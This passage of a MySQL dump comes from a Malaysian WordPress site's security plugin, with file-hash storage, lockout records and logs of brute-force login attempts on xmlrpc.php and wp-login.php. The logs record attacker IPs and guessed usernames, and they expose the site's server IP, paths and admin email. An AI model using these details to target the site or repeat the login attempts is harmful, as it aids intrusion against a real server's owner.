location.php\":{\"d\":1545638228,\"h\":\"ce83a362a741d7b3b0be57af8bc89174\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-yoast-notification.php\":{\"d\":1545638228,\"h\":\"e65222ae85fc616248c46f39d0403ed4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-keyword-synonyms-modal.php\":{\"d\":1545638228,\"h\":\"9c16791ea5640f064f624ea6e8f1a7fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-social-admin.php\":{\"d\":1545638228,\"h\":\"47180ae542fef3fc79f6a585bfa6266d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-expose-shortlinks.php\":{\"d\":1545638228,\"h\":\"3d74cf3b97b54028d84adec69d7e36fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-customizer.php\":{\"d\":1545638228,\"h\":\"7426d7c1c3cfb44268776d6c30da9deb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-collector.php\":{\"d\":1545638228,\"h\":\"80dbf903c334c3c66568ec2203e02ccd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-suggested-plugins.php\":{\"d\":1545638228,\"h\":\"33be666558115db1604fb738c62cbf93\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-yoast-network-admin.php\":{\"d\":1545638228,\"h\":\"d3c1fc6f1b90dafddc2f6723e60344dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-paper-presenter.php\":{\"d\":1545638228,\"h\":\"f9082b2a51b5347f02eaa2f64deb69e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-yoast-notification-center.php\":{\"d\":1545638228,\"h\":\"971b4771fa83c310b60c36a5559cb68c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-plugin-compatibility.php\":{\"d\":1545638228,\"h\":\"cfa5d07a60dc8ce3a5c53b7ae3f5b228\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-bulk-title-editor-list-table.php\":{\"d\":1545638228,\"h\":\"23060f7e0ae502c2963a79c4cf13bb38\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-help-center-item.php\":{\"d\":1545638228,\"h\":\"39665cd05b8e2e9e82a048f962d5d9fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-admin-init.php\":{\"d\":1545638228,\"h\":\"caeb029bfc7e7ff7bb457f4343b59852\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-extension-manager.php\":{\"d\":1545638228,\"h\":\"fd6a8695b62cfe13615a587e65c29b76\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-meta-columns.php\":{\"d\":1545638228,\"h\":\"f73069491a0bbba61f64126525b5d4ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-add-keyword-modal.php\":{\"d\":1545638228,\"h\":\"969282fe80faca18a0612a5dde01e80e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-admin-media-purge-notification.php\":{\"d\":1545638228,\"h\":\"ef136c5d475ad97d7eec1bd931341683\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-recalibration-beta.php\":{\"d\":1545638228,\"h\":\"a2a864ff20ec69e83b8dbdf8c4c7e350\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-product-upsell-notice.php\":{\"d\":1545638228,\"h\":\"ed94401c9211108261827b5d566141e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-export.php\":{\"d\":1545638228,\"h\":\"0360edcd29aa3adf1488fe84a734e751\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-meta-storage.php\":{\"d\":1545638228,\"h\":\"916442d030291188d8ec41bce048cadc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-database-proxy.php\":{\"d\":1545638228,\"h\":\"307ec9a14cd697d269b90a482edf1f74\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/index.php\":{\"d\":1545638228,\"h\":\"45d09bb48b4f308b8f63baab8f416733\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-admin-asset-dev-server-location.php\":{\"d\":1545638228,\"h\":\"22ab1eec1f92b160aa5d87edc211e31f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-help-center.php\":{\"d\":1545638228,\"h\":\"1c1649580f1f8601e6997292825d243e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-asset.php\":{\"d\":1545638232,\"h\":\"7c15423c723c3797c65cd234eddaeb96\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-extension.php\":{\"d\":1545638232,\"h\":\"461363eaab83593d7142366f7e26ef22\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-premium-popup.php\":{\"d\":1545638232,\"h\":\"2325784aa53897600f1c6dc3a279f082\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-admin-utils.php\":{\"d\":1545638232,\"h\":\"25c2aa147a5242cb30fb02725fc29218\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-gutenberg-compatibility.php\":{\"d\":1545638232,\"h\":\"2d66b3e17c73ed1d8359769b0e20c571\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-option-tab.php\":{\"d\":1545638232,\"h\":\"7a8a5524c8e7aab524427c9b1676e657\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-yoast-plugin-conflict.php\":{\"d\":1545638232,\"h\":\"0caa8e821d707dc38eab9e4a0e277ac4\"}}','2019-01-10 03:50:35');
/*!40000 ALTER TABLE `wpdp_itsec_distributed_storage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_itsec_fingerprints`
--

DROP TABLE IF EXISTS `wpdp_itsec_fingerprints`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_itsec_fingerprints` (
  `fingerprint_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `fingerprint_user` bigint(20) unsigned NOT NULL,
  `fingerprint_hash` char(32) COLLATE utf8mb4_unicode_ci NOT NULL,
  `fingerprint_created_at` datetime NOT NULL,
  `fingerprint_approved_at` datetime NOT NULL,
  `fingerprint_data` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `fingerprint_snapshot` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `fingerprint_last_seen` datetime NOT NULL,
  `fingerprint_uses` int(11) NOT NULL DEFAULT '0',
  `fingerprint_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `fingerprint_uuid` char(36) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`fingerprint_id`),
  UNIQUE KEY `fingerprint_user__hash` (`fingerprint_user`,`fingerprint_hash`),
  UNIQUE KEY `fingerprint_uuid` (`fingerprint_uuid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_itsec_fingerprints`
--

LOCK TABLES `wpdp_itsec_fingerprints` WRITE;
/*!40000 ALTER TABLE `wpdp_itsec_fingerprints` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_itsec_fingerprints` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_itsec_geolocation_cache`
--

DROP TABLE IF EXISTS `wpdp_itsec_geolocation_cache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_itsec_geolocation_cache` (
  `location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `location_host` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL,
  `location_lat` decimal(10,8) NOT NULL,
  `location_long` decimal(11,8) NOT NULL,
  `location_label` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `location_credit` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `location_time` datetime NOT NULL,
  PRIMARY KEY (`location_id`),
  UNIQUE KEY `location_host` (`location_host`),
  KEY `location_time` (`location_time`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_itsec_geolocation_cache`
--

LOCK TABLES `wpdp_itsec_geolocation_cache` WRITE;
/*!40000 ALTER TABLE `wpdp_itsec_geolocation_cache` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_itsec_geolocation_cache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_itsec_lockouts`
--

DROP TABLE IF EXISTS `wpdp_itsec_lockouts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_itsec_lockouts` (
  `lockout_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `lockout_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `lockout_start` datetime NOT NULL,
  `lockout_start_gmt` datetime NOT NULL,
  `lockout_expire` datetime NOT NULL,
  `lockout_expire_gmt` datetime NOT NULL,
  `lockout_host` varchar(40) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `lockout_user` bigint(20) unsigned DEFAULT NULL,
  `lockout_username` varchar(60) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `lockout_active` int(1) NOT NULL DEFAULT '1',
  PRIMARY KEY (`lockout_id`),
  KEY `lockout_expire_gmt` (`lockout_expire_gmt`),
  KEY `lockout_host` (`lockout_host`),
  KEY `lockout_user` (`lockout_user`),
  KEY `lockout_username` (`lockout_username`),
  KEY `lockout_active` (`lockout_active`)
) ENGINE=MyISAM AUTO_INCREMENT=626 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_itsec_lockouts`
--

LOCK TABLES `wpdp_itsec_lockouts` WRITE;
/*!40000 ALTER TABLE `wpdp_itsec_lockouts` DISABLE KEYS */;
INSERT INTO `wpdp_itsec_lockouts` (`lockout_id`, `lockout_type`, `lockout_start`, `lockout_start_gmt`, `lockout_expire`, `lockout_expire_gmt`, `lockout_host`, `lockout_user`, `lockout_username`, `lockout_active`) VALUES (625,'four_oh_four','2019-10-14 12:04:48','2019-10-14 04:04:48','2019-10-18 16:04:48','2019-10-18 08:04:48','183.197.116.193',NULL,NULL,1);
/*!40000 ALTER TABLE `wpdp_itsec_lockouts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_itsec_logs`
--

DROP TABLE IF EXISTS `wpdp_itsec_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_itsec_logs` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `parent_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `module` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `code` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `data` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'notice',
  `timestamp` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `init_timestamp` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `memory_current` bigint(20) unsigned NOT NULL DEFAULT '0',
  `memory_peak` bigint(20) unsigned NOT NULL DEFAULT '0',
  `url` varchar(500) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `blog_id` bigint(20) NOT NULL DEFAULT '0',
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `remote_ip` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `module` (`module`),
  KEY `code` (`code`),
  KEY `type` (`type`),
  KEY `timestamp` (`timestamp`),
  KEY `user_id` (`user_id`),
  KEY `blog_id` (`blog_id`)
) ENGINE=MyISAM AUTO_INCREMENT=29040 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_itsec_logs`
--

LOCK TABLES `wpdp_itsec_logs` WRITE;
/*!40000 ALTER TABLE `wpdp_itsec_logs` DISABLE KEYS */;
INSERT INTO `wpdp_itsec_logs` (`id`, `parent_id`, `module`, `code`, `data`, `type`, `timestamp`, `init_timestamp`, `memory_current`, `memory_peak`, `url`, `blog_id`, `user_id`, `remote_ip`) VALUES (23211,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQsPRTEVi0fEJEHuDZFZAAAAAs\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"43.242.128.32\";s:11:\"REMOTE_PORT\";s:5:\"26776\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQsPRTEVi0fEJEHuDZFZAAAAAs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846013.8543\";s:12:\"REQUEST_TIME\";s:10:\"1566846013\";}}','notice','2019-08-26 19:00:16','2019-08-26 19:00:14',18298944,19501920,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'43.242.128.32'),(23210,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"357\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQsKWXkG1atThADMYGNWgAAAMg\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"69.16.201.116\";s:11:\"REMOTE_PORT\";s:5:\"55994\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQsKWXkG1atThADMYGNWgAAAMg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845993.1588\";s:12:\"REQUEST_TIME\";s:10:\"1566845993\";}}','notice','2019-08-26 18:59:55','2019-08-26 18:59:53',18298160,19498000,'http://bintara.com.my/blog/xmlrpc.php',1,0,'69.16.201.116'),(23224,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQtqYir4pgxiIHnHK4oEgAAAco\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.104.160\";s:11:\"REMOTE_PORT\";s:5:\"48487\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQtqYir4pgxiIHnHK4oEgAAAco\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846377.7446\";s:12:\"REQUEST_TIME\";s:10:\"1566846377\";}}','notice','2019-08-26 19:06:19','2019-08-26 19:06:18',18303264,19502456,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'132.148.104.160'),(23223,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.22.92.226\";s:11:\"REMOTE_PORT\";s:5:\"36680\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQtlhTEVi0fEJEHuDZF8AAAAAM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566846358.9698\";s:12:\"REQUEST_TIME\";s:10:\"1566846358\";}}','notice','2019-08-26 19:06:00','2019-08-26 